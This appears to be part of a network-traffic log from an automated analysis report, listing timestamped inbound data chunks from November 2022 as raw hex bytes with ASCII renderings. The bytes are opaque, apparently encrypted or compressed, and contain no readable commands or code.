2022-11-07 22:49:10 UTC	12473	IN	Data Raw: 8f fc fa cb 89 f6 a4 bd 65 87 3c 9d 99 71 b5 83 60 4f 50 7f 70 9a 62 15 11 4b 95 df e4 4e f1 2b 05 65 8f 26 5c 4b 83 e7 a4 37 09 63 77 7d 5b a3 8f f4 5f 72 f2 24 fd ae 8d fd 42 04 76 5b 4a f4 c2 90 23 6e 72 a1 87 f8 07 8f cf 46 9a bc df 28 4d 00 94 c4 c4 17 41 0d ec 9e 42 18 de e9 d1 f3 d6 92 26 cb c5 b6 12 dd d8 07 dd 74 6b 65 16 29 1b a9 4d b5 ac bd f4 74 83 62 7b 19 76 92 cd 9a e7 10 3e d4 d1 40 48 7f 4a 3f 1e b9 17 be bf da 2f 8c 5e 23 4b 70 53 49 04 33 d8 cc 92 6b 97 fe bb c8 7a 47 c9 45 e7 8f 55 30 b1 be 16 57 b6 a0 11 42 33 64 71 ae d2 e9 48 6a 56 4a 08 19 74 b3 3a 03 4b be 82 5a 92 fc 82 41 b4 1a 57 60 09 27 28 d0 56 51 29 00 5c a1 42 18 e9 ed 5c f3 b2 f8 c3 a0 d9 a7 54 77 b2 70 fe 09 b6 09 94 d2 be b8 03 e0 fb b2 3f fe 1e ac 54 84 b4 b2 6b d5 de Data Ascii: e<q`OPpbKN+e&\K7cw}[_r$Bv[J#nrF(MAB&tke)Mtb{v>@HJ?/^#KpSI3kzGEU0WB3dqHjVJt:KZAW`'(VQ)\B\Twp?Tk
2022-11-07 22:49:10 UTC	12489	IN	Data Raw: ca 8e 6f df 87 b4 d0 a7 3f 77 f0 a8 85 10 8c 8c 35 d2 ab 7f 9b 2e de 3e 0a 4c 73 98 f2 da 6d 87 4d c2 a3 64 1a 3d bb 6e 4b 5b a4 f2 73 65 9f 4e 99 67 a6 37 69 5a a3 25 2d 96 01 bc 76 79 bb 5c ce a2 ab bf 53 eb 00 1e 57 dc be af 98 25 f2 c4 2f 7d b2 19 c8 aa a9 ab d8 83 42 2d 58 0d ac a6 af 8b a7 ac 4f 05 57 28 96 03 fb f1 10 35 ba ec c4 79 0b 6c 7b 93 43 f3 e5 f1 d2 79 6e 39 81 3e a6 75 4b cd 2d 5d 1c b0 22 5f 2a 91 9c 22 09 96 da 46 b9 a2 7a 05 95 f0 24 a3 7c 3f f1 4b 02 74 c1 25 e3 35 2e ca 07 90 82 fd f1 08 5d 04 1d 95 7f 35 23 4a fc 2c 98 07 74 57 9e 0b e7 aa 1e 01 4e d3 46 0c ed 5c 5d 35 07 7e 92 9e 24 97 77 10 3f db 73 11 79 be 5d 5e 92 01 18 15 a3 8b b3 b0 82 b6 bf 4e c2 0f d5 11 cc 59 2f a1 fd 16 52 8e 40 27 5f 89 98 00 89 a3 ee 09 13 70 c8 2f 1a Data Ascii: o?w5.>LsmMd=nK[seNg7iZ%-vy\SW%/}B-XOW(5yl{Cyn9>uK-]"_*"Fz$\|?Kt%5.]5#J,tWNF\]5~$w?sy]^NY/R@'_p/
2022-11-07 22:49:10 UTC	12505	IN	Data Raw: 4a 90 4f dd 58 44 ff 05 79 df fd ae 89 31 49 dc 88 2d cf e1 af df ee 01 5a b0 63 cf 62 2b 39 33 f9 d2 a4 85 36 78 2c 5b 87 e6 6f 6f cf 25 e5 8b d8 cd 93 df 19 fd 64 e5 64 16 31 cb 06 86 e1 d7 cf 0e 4c 3b 70 67 a1 4f e4 3f 0a 0b 26 87 9b fe 16 ef 9b 1c 73 ac 6f 99 84 4f 93 1f 6b 3b e7 e5 57 4d e9 ff aa ed 59 3e 77 7d ac 26 59 3b fd 9e 88 76 50 67 0a 2f 7f d4 17 ee 0e 9e fb ae 6a 23 9f e6 8a 55 eb cb a6 8a 18 a7 30 48 9e 89 dd 31 84 9b 3b 89 81 56 27 94 04 0b ae 0c 4b f8 5c 8a 51 dc 78 d3 1b 39 15 94 8d bd e0 a8 93 2b 11 f3 4f f4 5d 52 f0 a3 e2 96 28 9d 4b 87 53 50 fb c4 72 bb 86 59 b0 1f bc 59 e5 e3 e6 0d ea eb 63 b6 86 05 af 98 55 60 05 56 ba ee 0e c7 9f 18 03 c5 8d e8 32 42 09 42 bd 3a c5 92 7f 27 f8 bb a6 94 f9 94 7c fb 18 e3 43 76 f4 85 63 4d 6e 5e 7a Data Ascii: JOXDy1I-Zcb+936x,[oo%dd1L;pgO?&soOk;WMY>w}&Y;vPg/j#U0H1;V'K\Qx9+O]R(KSPrYYcU`V2BB:'\|CvcMn^z
2022-11-07 22:49:10 UTC	12521	IN	Data Raw: bf 46 95 bb ad e2 b5 b2 8a 6d 3e 12 2e 63 1e ca a7 de ce 29 ac 24 9a 81 e2 a2 08 e8 eb f4 f4 80 84 26 3d 1d 97 c1 2e a6 4f 5c 84 b8 a9 67 e2 6b bb 64 fc 26 ea e0 bf b5 71 24 2f c1 6a ff 86 6b 37 54 1d 6b f6 2b e3 26 f0 9f f2 16 c4 e3 c5 d8 96 de aa e7 d9 f5 32 58 da 58 03 19 31 7d ae e3 20 98 83 8e d0 a6 ea 9b 77 83 fa 6a ad 13 e3 1c f8 2b 4b 6b e2 b1 18 77 90 4d 99 56 94 42 7f 35 40 71 23 66 2e bb a5 9f 5c af a3 19 d5 f5 f7 64 d3 0f 15 3a 3f 02 40 ea 5d 28 de 33 bd 75 98 f0 09 5a 4c 55 a6 60 b8 10 9f 7d 04 f1 c4 61 35 b4 ff d3 8b 46 b5 6a b0 f1 b3 85 51 8e 09 9d 88 d4 1a 0e 28 48 55 56 fb 14 3f cd b9 f5 ae a7 2b d9 5a 32 cd e3 f6 92 8a c9 4a 25 88 ad 4b 3f c7 1b 3e 18 d5 a9 b0 39 64 fc 1b 22 29 14 85 56 3a e5 48 61 84 f6 78 dc 5c 01 ae 31 0c 25 25 56 62 Data Ascii: Fm>.c)$&=.O\gkd&q$/jk7Tk+&2XX1} wj+KkwMVB5@q#f.\d:?@](3uZLU`}a5FjQ(HUV?+Z2J%K?>9d")V:Hax\1%%Vb
2022-11-07 22:49:10 UTC	12537	IN	Data Raw: 8c c1 fd 29 06 57 49 f9 83 9a 1f ff 7c dd 65 43 4f ab 7d 84 9a ec b6 58 16 63 e8 af 0b 1a f4 0a dc 45 97 c5 57 ae 03 f0 4e b2 cf af b9 74 04 b6 c8 9c 0c 7d 0d 08 e8 76 19 31 d1 7d 19 e5 71 62 04 db 5c b9 19 8b 98 19 fb c5 e6 35 e0 19 7f 2f 0d c7 8b e7 04 13 c9 6c 23 c5 52 58 d7 fe a4 5c da dc f3 fb 70 c6 b3 c5 37 26 c7 48 f2 cd 5d e7 73 96 a8 e2 54 ce eb 65 79 55 a7 03 c1 f7 ef 28 69 e4 23 12 4b da 31 39 fb 57 da c3 db d6 47 91 d8 d8 2a 2e 0f 66 19 56 13 95 e5 f1 a4 ab c7 ba ce 15 4b 2d 37 65 d6 7f 21 21 d4 6e 04 a3 f6 6b ba 00 3f fe de b9 9f f3 1c 76 6a 28 6b 73 ec e1 31 cc fe ed c9 f2 73 d6 21 ca 39 3f 02 eb 07 cb 33 45 56 b5 81 63 e6 20 71 3b dc 58 72 e2 81 f3 a2 fb aa 49 4a 06 43 ca 94 a2 b1 8a f4 bb 06 d3 6e 50 b3 4c 03 6e a7 a0 f7 f2 6a f1 15 13 1d Data Ascii: )WI\|eCO}XcEWNt}v1}qb\5/l#RX\p7&H]sTeyU(i#K19WG*.fVK-7e!!nk?vj(ks1s!9?3EVc q;XrIJCnPLnj
2022-11-07 22:49:10 UTC	12553	IN	Data Raw: c6 36 20 af 1c b7 76 df 57 08 29 ec 1d f0 5c 57 e7 b7 16 50 45 b4 5c 31 65 bc de 50 26 5b f8 d8 f6 e1 4c b6 c3 30 ef 62 50 03 2b 80 a2 38 7c 93 67 f4 b9 fe eb 99 ab 75 f1 c4 2f 79 a2 44 eb aa 21 d6 eb 8e 4d 49 1e 25 9a 3f 27 df ab 0e c6 1c e5 dc 70 b0 a7 05 3c 79 37 24 0e 39 fc 65 5a c4 a8 ef f4 51 53 51 0e c7 13 e3 97 a1 e6 c3 34 33 9d 7f 6f ec 3d 8b 11 c4 77 df 31 8e 3a f6 22 30 53 16 07 21 06 77 88 dd 3d 76 f9 61 f5 10 b1 20 b8 60 ae dd ef f5 df e5 63 3d dd 4c 16 95 86 df d4 7b 8f e0 18 42 ee bc 2d 30 06 da 8b 30 c4 25 e8 76 a4 b1 32 75 de 35 97 69 2f dc 8d 29 94 22 bb 77 dc 9c 4b 59 60 88 e3 1f 4c f5 35 38 3e 63 09 89 ca dd ba 80 29 05 22 fa f4 07 64 0d 50 d1 59 fe 31 0d 9e ee c1 91 c2 c6 4a b0 e5 3e bb 4d c8 25 80 06 39 63 1f fb 96 c4 6e f9 1d a7 31 Data Ascii: 6 vW)\WPE\1eP&[L0bP+8\|gu/yD!MI%?'p<y7$9eZQSQ43o=w1:"0S!w=va `c=L{B-00%v2u5i/)"wKY`L58>c)"dPY1J>M%9cn1
2022-11-07 22:49:10 UTC	12569	IN	Data Raw: 75 e2 fb b6 67 3c 74 0b f2 81 5f 5e 49 ef db 28 fa a7 5d ac 99 76 7d 8a e7 55 ea e2 4e 1f 90 38 09 55 c3 68 9a c2 9e ec cf 72 16 3c de 63 c2 c2 20 34 a6 a0 c2 7f e1 90 99 3c fe ea a3 2f 7c 2d df 99 44 09 9d 11 98 2a ec 5f 3c 0a d5 90 ba 9a 3a 84 b4 e4 ab a0 65 12 1f 3b 56 9f 10 99 a6 40 87 e9 7c 31 cc 69 42 1e 41 ab 93 f8 14 2e a0 2c 84 bb f6 51 7e 28 8f 2e 53 b9 04 57 52 e1 45 fb 13 35 1b 7e 29 ed de e1 99 56 fe 77 56 e0 20 a5 0c f2 f9 be 1b c9 60 e2 58 c4 a8 3c 38 75 3e 1c 9f 40 ab 42 b5 f3 0c 99 7a cc c1 2a ed 66 4d 9b e7 88 8c ac f4 62 f1 d4 97 e6 dc 87 bb 80 ca a8 c8 7b d0 db c9 e7 35 51 fa bc 7e 81 79 fa 02 e8 e8 3e c8 59 d1 e1 29 42 07 c5 1d 12 27 b0 f9 2a b3 b6 19 6b 9a cf e3 3c 8f 46 fd 55 ba a0 de 71 c6 c3 61 0c f9 87 57 61 1f c6 eb d1 3d 7d 2f Data Ascii: ug<t_^I(]v}UN8Uhr<c 4</\|-D_<:e;V@\|1iBA.,Q~(.SWRE5~)VwV `X<8u>@BzfMb{5Q~y>Y)B'*k<FUqaWa=}/
2022-11-07 22:49:10 UTC	12585	IN	Data Raw: 29 ec ea 01 ce f8 5e 95 6c dc cb f7 ba ae 13 ea 0f 28 df ed 54 1a af c5 ff ec 96 89 fb 69 7e 55 08 49 60 76 6f e2 a2 d5 3f 5e c7 36 24 08 9e 6e 31 fb 94 3c 28 ab 92 5c 26 a8 54 57 b6 94 69 92 2a 36 fd bd dc 91 85 fa 10 b2 f4 ab 55 5a 4b bb fd 41 60 91 9f fe 51 9a d6 a8 03 b9 d5 e7 a0 56 89 a9 8f e7 5c 22 17 33 f1 43 38 6f 55 b6 e6 35 e5 46 42 09 22 ae 54 62 3c 54 8d 1e b0 9c 86 28 ca 75 93 45 b1 fa a9 97 ff 3e 3b 1e 1d 75 5e 53 72 27 8c 6e f3 0e fb 1a 7b f8 f5 8e 68 6d bb ca 57 68 79 39 41 a1 69 c0 0b cd c4 4b 36 d6 f7 41 5e fa cf 50 20 c2 63 f0 58 5b 4b 2c 71 d8 c0 ab 87 39 59 2b 69 1d 6d 56 58 56 e4 f2 cf fb f7 b4 65 61 39 ff ab f2 a6 77 d5 1d 19 72 fb 6b 93 4d c4 97 5d df 13 a4 cc 3a 1e d7 48 d0 bc 87 64 36 88 9a b8 d5 cd d0 c9 e0 93 8a 53 e8 e0 ad f1 Data Ascii: )^l(Ti~UI`vo?^6$n1<(\&TWi*6UZKA`QV\"3C8oU5FB"Tb<T(uE>;u^Sr'n{hmWhy9AiK6A^P cX[K,q9Y+imVXVea9wrkM]:Hd6S
2022-11-07 22:49:10 UTC	12601	IN	Data Raw: e6 a2 d4 c9 d1 65 04 0f 98 81 ab 5e 82 7b 45 96 41 37 ad eb 18 10 44 0a 89 76 c8 fd 54 52 3d f4 39 bb 1c a9 97 45 ed dc ca 79 2e b0 5f 8c b7 fb 8a 12 7d 62 bb a5 b6 a7 27 10 98 8e 0e ba eb b9 e8 21 89 fb b8 1d a0 b8 b0 f6 19 af 67 ee ea a5 d2 1d d1 32 3a f8 c8 f3 45 a8 db 90 1e f6 d3 d8 b7 b2 2f 69 12 38 45 e9 11 81 d8 24 1c 28 14 a4 ac 03 9c 63 b9 42 49 35 13 00 37 6d 34 b4 66 97 04 9c 7e 32 01 0a b3 b4 bf 71 2e e7 0a fb db e2 ce bb b8 5b 8e 94 cd 02 e4 44 1b b1 8e 50 75 18 55 60 52 c6 a3 1a bc c3 92 6f f5 f8 79 33 d7 d2 05 99 8b 03 91 dd 6c d0 d2 8f 54 1e 3b bc a4 5f 02 2a ec 88 a4 03 9a 5a 70 3b 82 41 48 c8 97 7e 51 5e 8f 1e a6 3e 16 f8 ec b6 11 30 08 e5 80 3b c8 5a 00 01 18 45 00 c8 d1 e7 e7 b3 c2 e6 27 9c 55 2c 99 cf 68 55 12 55 fc 63 d8 2a 13 36 c4 Data Ascii: e^{EA7DvTR=9Ey._}b'!g2:E/i8E$(cBI57m4f~2q.[DPuU`Roy3lT;_Zp;AH~Q^>0;ZE'U,hUUc6
2022-11-07 22:49:10 UTC	12617	IN	Data Raw: ba 45 e8 28 10 f6 a6 f5 05 ee a1 44 ed c5 b5 13 2c 32 70 d9 61 27 52 50 12 65 62 0c 42 12 cf 34 33 6f bb 6e 71 df 84 8f 12 cc ab 19 10 49 26 3e de 11 a5 62 a4 e0 89 3d b3 3e 5a 2e e8 1f a2 7f ee f0 e8 94 0a ee d9 f1 29 6e 79 25 e0 7c 1d a8 65 e6 e5 d5 4b 93 80 9b 83 7c a2 21 8d d1 d9 e3 6e cd ae 92 da 34 c2 ed c2 30 1e 12 ae 43 b6 17 06 cb d7 68 a2 2c e0 0b 12 e9 c8 5b bc 30 5b 9d f6 15 ca 0a 97 1a 7c 36 82 a7 38 9f ff d1 84 35 ff ad 90 9a 7d 31 78 15 ee b9 5a ca 0f ef f2 20 3a 34 2b 5f cf c7 3a 0a 0a ff e6 d3 0b b4 63 f9 9e b5 52 8f 9b ca 11 f8 30 eb 24 d4 4b ff 76 7a 62 ca a1 11 4f 3d a1 3e bb 5a 91 77 31 04 64 2b 4e 31 87 20 d5 48 5d c3 4d cf 6a cd 5e fe c8 fd 00 8a ed fe 43 ff c4 bd 8f b1 67 ad 6e 90 bc b8 e9 03 39 ca ff 74 54 14 0f b6 ee 39 16 76 2f Data Ascii: E(D,2pa'RPebB43onqI&>b=>Z.)ny%\|eK\|!n40Ch,[0[\|685}1xZ :4+_:cR0$KvzbO=>Zw1d+N1 H]Mj^Cgn9tT9v/
2022-11-07 22:49:10 UTC	12633	IN	Data Raw: a6 22 5d bb 4d 38 4f 94 82 c2 ba d8 43 5d 82 ec f1 d6 e1 b1 58 df e8 42 28 3c 2a 0b 4e c1 30 15 b0 97 0d 18 c0 3d 21 6d 36 14 49 ea c1 12 b0 3a e5 0a 73 32 5f 74 83 7b f0 ca 18 30 53 6b 71 c1 4b 19 74 e1 42 d3 27 85 36 e1 e9 d7 01 b6 1d 07 a1 44 86 89 83 9d 11 19 1c de 0d cb 6e 54 35 fd dc aa 6a eb 91 19 10 42 ff b6 e8 97 89 81 55 71 65 20 c6 77 5a 85 63 a5 30 8d a1 52 e1 a6 8a ee 3b b2 bd fe 80 9b cb 91 c0 39 36 3b 8e a5 41 23 8b b8 f0 32 e5 76 14 ee 2b cc 75 4a ed 12 4b 1b 28 24 5b a1 ae ca 35 55 77 8f ae 2f d8 92 50 6e 8d de 6a 0c b2 ac e3 da 0e f3 35 76 ad b7 82 54 5d ca 40 53 ff ae e4 fe 88 76 b3 5b b0 88 63 d9 3c 55 6c 41 89 36 23 13 17 61 e0 fc 84 f2 a6 56 bd 9e f6 62 f4 27 de c8 c9 ca df fd 88 c7 4f ad 23 91 b0 8d 26 77 f0 3f cc ab 62 1d 0d bb c6 Data Ascii: "]M8OC]XB(<*N0=!m6I:s2_t{0SkqKtB'6DnT5jBUqe wZc0R;96;A#2v+uJK($[5Uw/Pnj5vT]@Sv[c<UlA6#aVb'O#&w?b
2022-11-07 22:49:10 UTC	12649	IN	Data Raw: e2 b4 77 7f 61 f4 90 9c 5b 33 80 18 2b f4 05 9e 31 29 36 7f a1 5b 99 65 fb 69 18 92 3b 1e e7 1c b6 bc 20 fc e4 d9 fd c3 d7 bc 07 bd 5d a3 fe 55 a7 32 46 39 7b 4e bf cd 20 65 1e 96 a0 c3 28 e8 42 22 b8 d7 55 db 22 36 95 ee 24 ef 91 73 ec f9 58 df d3 a2 29 eb 0e d5 72 f0 41 fe a7 1a 9b be 1e e7 31 26 cb 4f 78 9b c4 38 5f 2e 3c 63 f2 2d 03 b1 dc e7 18 43 a9 c0 57 4a 1d 87 c6 28 0f be 1c 53 e3 c0 6d 47 ae 5f 54 45 db f7 97 11 35 68 da 01 8a 3f 64 8e f6 ba bf a0 e5 42 e3 18 43 c5 72 a4 95 be d1 02 76 dd dc 08 ce 2c 3b ce cb b4 dc 08 9f 80 e4 fc b7 b4 6a 71 9f 71 79 d6 46 b3 af f9 d7 8c ce 89 bf 84 34 16 c3 64 48 e8 ea 1c 26 82 e8 4a fb a6 46 d5 7b 2e 41 74 a7 4a 08 b1 68 35 0a ad 3c 02 a6 1d 7c c6 80 58 9f ec 1b af 82 d7 27 a3 3c 5e c5 2b 88 45 10 ff 77 51 fb Data Ascii: wa[3+1)6[ei; ]U2F9{N e(B"U"6$sX)rA1&Ox8_.<c-CWJ(SmG_TE5h?dBCrv,;jqqyF4dH&JF{.AtJh5<\|X'<^+EwQ
2022-11-07 22:49:10 UTC	12665	IN	Data Raw: 48 f6 be 8f 94 d8 89 6a 5d 5d 42 b5 2f 31 d0 52 af e6 c1 52 c0 66 11 db 47 40 a9 d6 2b c8 2f ec 2e 53 e8 91 8f 04 53 e5 11 3d b9 dc fd f1 bd d1 72 48 1c 86 6d 0c eb 48 ba db a0 eb 23 c7 af 33 dc 91 db d9 12 e9 de fe 12 83 e5 e1 11 cd b7 ef 04 9a c0 c3 6e 8f 7f 4c f3 af 59 b4 c3 bd c6 f9 6d c5 89 cf d1 fd 5f cd c6 a0 ab 38 61 8f e6 d2 91 fd 1e 26 e3 ca a6 e8 77 0a 7f 8c 42 72 bf 67 99 43 b2 ed a0 dd e5 ac 7c fb 92 f1 13 d7 23 ea bf e6 a3 96 64 20 cd 66 6c 6a 61 6f 0c 53 b3 e5 24 e5 ba f1 24 85 f0 15 f5 22 e7 92 57 18 9d ae b0 19 bb 91 aa 05 e9 4c c4 4b d3 7e 28 12 bb e9 57 bc f6 3e c2 97 09 d9 21 9d 6f 68 49 51 54 9f 85 89 05 17 e5 58 ad 7b 55 b7 73 63 14 08 a3 ce ec 3c 15 b1 b7 5f b5 5d fd 12 bf 6a 63 a3 b7 b5 48 62 fe 56 80 53 35 e6 6e a3 62 77 b9 9b e5 Data Ascii: Hj]]B/1RRfG@+/.SS=rHmH#3nLYm_8a&wBrgC\|#d fljaoS$$"WLK~(W>!ohIQTX{Usc<_]jcHbVS5nbw
2022-11-07 22:49:10 UTC	12681	IN	Data Raw: e3 79 a5 ce 7b d2 d2 a5 ce 26 d8 8b 7e 50 9f 09 55 50 f8 85 f9 50 3d 69 c8 6a 3e 0e 7f cf 2a d3 96 13 25 1c ac c0 c2 79 70 83 58 2a f4 f5 54 41 f3 f6 76 32 da c4 59 1f af c9 4e 85 0f 6f fd 5c 6a be b0 99 a7 ef 32 51 79 69 91 1c 8f 6d 73 06 e5 1c 39 75 78 a0 03 17 81 c4 9e 9e cd f7 b0 e6 ac 19 24 26 4b c0 64 05 4d e8 e4 63 7f 12 70 99 fe c4 40 86 e7 42 47 b3 89 8f 01 09 dc 16 89 04 51 1c 6f c8 2e 68 f9 9f 87 4e fc 9d ba 58 0a a8 18 70 92 f3 e5 5d 4f a4 77 13 1a e7 b3 7a f7 91 8e b1 d2 a5 5a 86 b7 f6 17 41 82 a3 09 29 a5 58 4f 7a 64 37 c3 87 f6 c4 f7 15 47 ff d0 f9 59 bb ea 9f 7f 93 fb f2 06 a2 7e 31 e6 69 78 c5 a9 60 2b 5e 82 69 38 fe c4 c7 10 9c d0 ce d5 e2 3f 70 48 90 a9 ab 75 48 4c 79 4e a5 80 c9 9f 1e 99 58 5e 31 08 32 44 d5 33 6d 49 f2 63 56 ca 25 6d Data Ascii: y{&~PUPP=ij>%ypXTAv2YNo\j2Qyims9ux$&KdMcp@BGQo.hNXp]OwzZA)XOzd7GY~1ix`+^i8?pHuHLyNX^12D3mIcV%m
2022-11-07 22:49:10 UTC	12697	IN	Data Raw: 42 c5 d7 5d c9 f7 46 2a 2d 45 15 e4 f6 c3 29 de b5 bf 93 d6 94 9b c8 e6 ec 7e 18 bd 08 8b 9c f1 91 8e 3b 83 6c b1 93 69 e7 2e 56 c9 4b f4 5f f6 f7 07 2a 2c a1 db cb 56 8b d5 13 c9 86 03 da 0b d2 cb db 64 c4 b1 5a cb ef 32 29 10 14 94 b2 be fc 11 2d dd af 4d 47 49 ce 9d 27 a0 f2 41 ee 3f c5 4e f8 e8 d8 d6 bf b0 7a f9 c7 9a 0c d9 8d 4f a6 5b 2a 71 04 3e 31 5b ae 5f 38 4a 76 5f a7 88 6e 0a 14 16 c5 49 e9 21 8b e0 33 54 73 2f 69 72 95 75 c3 ee 02 16 1c 9c aa 59 66 17 25 d4 7c 0e cf 62 de d7 5b 7f dd bb 78 12 2d a5 94 d8 89 b1 46 5f c2 8b 16 9d d5 4a c2 91 cc a9 85 c9 bd b3 7a fa f4 94 56 8c 30 ed 51 a9 c1 0b 8d 8e 93 aa e0 d3 32 22 ff 5c 7e 8c 0d ef 4f 32 5c e5 38 de 69 63 98 35 c9 ba 9f 5b 40 b9 7e 7f 56 2a f5 0d 41 5a 6a c1 5b ef 18 a6 33 1e 66 b7 08 44 95 Data Ascii: B]F-E)~;li.VK_,VdZ2)-MGI'A?NzO[q>1[_8Jv_nI!3Ts/iruYf%\|b[x-F_JzV0Q2"\~O2\8ic5[@~VAZj[3fD
2022-11-07 22:49:10 UTC	12713	IN	Data Raw: a5 6c 57 10 cb b2 3d f9 4c 66 87 6e 7c 22 47 25 3f e3 07 37 18 19 43 51 cb 33 58 38 18 77 19 49 72 df 04 44 0b de 79 cf 7e 33 fe ff ff 88 f2 49 f0 23 3b 99 2c db 32 cb c1 6e 3b 7f 16 95 d0 c1 d3 df 71 31 c0 3e 58 7f 16 eb 7b 2e f0 a4 ce b2 d2 fc 86 d9 d0 4c 55 f0 ce 92 a7 fe c9 1a 31 c1 c0 09 6f ba f8 5e 5f 0e e4 e9 40 f0 54 f7 46 0f b3 7d 65 a8 aa b2 54 11 01 6e e7 f0 49 c2 a8 08 2c 30 56 3f 29 75 df 12 9e 37 8f ed 1a 61 52 4c 7e 20 7e dc 7f 9e 7d 7e 11 fd fd ff ff 72 f7 c7 a8 74 0e 1d 76 0e 04 e9 b4 73 ff ff 33 16 f8 03 f1 c1 25 15 cb 53 78 ca 68 c5 c0 09 f8 91 73 1f 3d 46 d8 7a 0b b5 dd 0a 9d 6d bf ff b0 5c 3d 2a 33 b6 24 0a 99 e6 9f a6 7e b8 21 16 2b 68 94 ff cc 44 2a 7a 0f 75 43 d0 d0 d1 6b f9 d1 16 b6 37 99 f1 cb 47 3d 5c ab f5 d1 49 fe 25 fc 8c 99 Data Ascii: lW=Lfn\|"G%?7CQ3X8wIrDy~3I#;,2n;q1>X{.LU1o^_@TF}eTnI,0V?)u7aRL~ ~}~rtvs3%Sxhs=Fzm\=3$~!+hDzuCk7G=\I%
2022-11-07 22:49:10 UTC	12729	IN	Data Raw: 76 87 ae 94 13 04 8f f9 64 03 6a 2f f0 a7 c4 e1 c6 3c ab 31 2a 66 22 07 34 3d ba 0f 71 80 8b a1 9e f8 3c 86 de fb 92 21 37 7b c4 95 01 df 39 e1 05 2e 9a da fa 91 2b 93 97 87 a7 55 5e 7c f7 3b c3 c7 e2 3f 5d 36 17 ab 91 25 3b 0b 80 d9 c8 47 ea 1e aa 9c 8f f0 dc 2b 15 82 76 dc 49 9a f8 d9 09 b4 bc 17 8d 87 78 c2 37 fa d7 12 42 08 28 6d a2 50 fc 08 ae 25 c1 d9 c9 62 b8 a3 ca 67 ac a2 af 79 f5 4a c6 a1 26 44 88 86 9d 13 d1 55 44 54 5d fd 43 f0 04 98 58 9d 16 d3 10 9a e4 b1 83 db 11 e3 2e 5b eb dd 16 50 bd fb 94 b0 9c 7b 5a 13 f6 80 3f d1 9e 6f 62 80 ec af 2e 9f 2f 4a bc b4 fb 9f c0 15 c2 4f 57 cc a9 ed 8d 47 50 25 ec 2a 9d 0e e9 1c 3b 56 23 8a 75 f1 3e cb ae 55 bd a9 26 45 cc b7 e0 d9 1e f0 55 bf 23 4b 30 68 dd 59 0e 4a 00 e5 53 6a 4b 9f c6 e1 db 53 54 db 2f Data Ascii: vdj/<1f"4=q<!7{9.+U^\|;?]6%;G+vIx7B(mP%bgyJ&DUDT]CX.[P{Z?ob./JOWGP%;V#u>U&EU#K0hYJSjKST/
2022-11-07 22:49:10 UTC	12745	IN	Data Raw: a3 24 c6 b5 bf d1 e8 08 dc 2b b9 94 c9 87 a6 a4 92 aa 36 ba 38 41 75 1d bd 35 0e 1f b7 19 3b ce 0a e2 da 1b 01 8c fd 10 1d 1f 1d d8 31 49 ad 43 ed 6b be 4e d4 ba 71 bd e5 bc d2 82 d8 cc f7 ec c8 a1 49 84 a6 e9 c8 30 b9 ec 7b 63 87 9e 55 8d d6 47 2a 97 f7 90 41 aa b8 b0 4d 00 64 36 28 bc 2a 12 12 75 b1 8e af 86 af 37 9d 41 20 12 9c 03 20 83 c1 ff ef ed fb 46 a2 cd 8a bf 4b e4 6b 6b 49 d3 d8 6b a8 4e ca e8 2f 1e 3f 09 7c 3d cb d8 8e f7 01 4a b7 a6 67 10 a2 0a 71 0f 86 00 d3 9b a6 b8 b6 7f 4f f3 9a 8c cc 2c 98 19 64 fd 61 7b 14 cf 2f 44 a0 cf d2 d5 7a e3 c7 c7 08 5b 21 46 64 e1 1f 9b 13 63 8d ca 54 b9 33 b5 6d be 26 44 9c 35 ae 53 4d 67 3f b4 46 23 b5 b5 31 8a 22 bb 89 4b e5 df f6 a8 2c 2e 69 11 b9 ed 46 84 ef af 97 0e 8f bc 5f 60 17 0c a1 1f 95 cd 0d 31 1f Data Ascii: $+68Au5;1ICkNqI0{cUGAMd6(u7A FKkkIkN/?\|=JgqO,da{/Dz[!FdcT3m&D5SMg?F#1"K,.iF_`1
2022-11-07 22:49:10 UTC	12761	IN	Data Raw: cb 76 71 17 51 58 51 ed 48 d6 a8 b3 fa 89 de 99 ea 6a e0 82 44 23 cf 26 63 6c 49 d3 f2 a8 bf 70 f9 9f 85 79 5c cd 53 f5 6e ed 67 11 04 fd 55 6e 09 c6 ab e8 70 1f 71 42 7f 15 bc 3d 43 71 58 9d be 4c 55 c0 4e c9 73 fa 28 35 ac 3d 38 5a c6 f4 23 3b 55 7a 49 ad 3b 5b 4c b8 1f f0 2a 2f f6 6e d3 f1 3c a0 e4 d9 98 e0 64 f9 28 c9 cd 98 fa 19 0d cb 7c 45 9c 64 d8 71 cb 4e 91 25 41 c0 fe 5c 64 95 39 cf 85 26 8d 8f f0 7c 3b 39 e9 e3 d4 6f 42 1e 53 57 59 86 91 0e 66 bb 6c c4 24 df 8f 83 ac 56 9d 0d 6e 6b 94 0a 6c 90 c7 da 01 35 cc 15 1e ff 01 70 69 f4 6d bd 08 63 d8 be 42 5a 49 f2 cc 38 80 44 39 c1 35 92 6b 2e 37 b2 64 05 85 38 e1 0f 6d a0 ae 22 c5 8d f4 ba 45 47 aa 9d 05 f6 c6 ee 40 85 41 a0 82 3e b6 3c 4c 48 7a 0b 03 44 78 f5 87 fd 3c bb 01 2c 8e 9b b3 75 9d e6 d0 Data Ascii: vqQXQHjD#&clIpy\SngUnpqB=CqXLUNs(5=8Z#;UzI;[L*/n<d(\|EdqN%A\d9&\|;9oBSWYfl$Vnkl5pimcBZI8D95k.7d8m"EG@A><LHzDx<,u
2022-11-07 22:49:10 UTC	12777	IN	Data Raw: f7 1e b1 d7 f5 5c 3c 4d fb 92 ee 26 70 f1 5c 6a 84 b9 32 ab cc 17 bf 8a 6e fb f6 47 b9 50 af 0b 4a b1 b3 a1 9b 00 92 80 b7 5c 91 ee 4e 15 7c bb a9 79 a4 a7 37 9e 7f 61 eb 60 7a fd d3 b9 b5 b6 7f 55 5f b5 32 57 8b 5b 68 b5 71 6f ca 14 c3 77 0e 52 2c 5d b8 d5 0b 35 a9 73 5f 85 1a 7e 85 57 4a 19 35 1a cc a9 58 df 8e 25 8f fc 9e f1 3f 75 cc 48 e5 8a 7d ab 12 d7 cd 0b e9 5d 43 8d dc 1e 73 c4 d6 26 65 64 b1 a3 e6 7c 3a 3a 56 bf e9 83 fb 55 08 8b 79 aa 37 08 99 1f 40 d1 fc 19 8b b4 72 fe 5c e4 fd 9a b2 ff 70 42 2f 7e ea 4e 70 9e f8 b3 e5 95 63 ec 3d 83 83 e9 19 ef 1e 24 76 68 dc 86 a4 be 1d cd 0e 9d 08 70 b1 3b eb a3 1c c5 58 52 61 07 fe 6e cf e7 2e 51 4d 42 b8 81 1e e0 59 09 24 28 c6 d5 23 b6 85 b2 43 4a 44 a0 01 13 94 e2 68 ce 00 d9 d1 85 74 04 22 d4 6c 1d ee Data Ascii: 